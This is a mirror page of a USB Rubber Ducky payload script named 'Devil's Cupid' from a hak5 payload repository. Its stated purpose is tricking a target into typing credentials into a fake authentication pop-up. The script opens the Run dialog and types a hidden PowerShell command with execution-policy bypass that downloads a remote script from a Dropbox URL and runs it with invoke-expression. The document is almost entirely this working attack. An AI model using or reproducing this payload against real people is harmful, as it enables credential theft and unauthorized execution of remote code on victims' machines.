Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/credentials/DevilsCupid/sourceCode.txt
2968 views
1
REM Author: Nejc Pirečnik
2
REM Devil's Cupid
3
REM The Devil's Cupid is a Rubber Ducky script that tricks your target into sharing their credentials through a fake authentication pop up message.
4
5
DEFINE #DROPBOX_URL example.com
6
REM You must replace the URL end with ?dl=1!
7
8
DELAY 1000
9
GUI r
10
DELAY 500
11
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #DROPBOX_URL; invoke-expression $pl
12
ENTER
13
14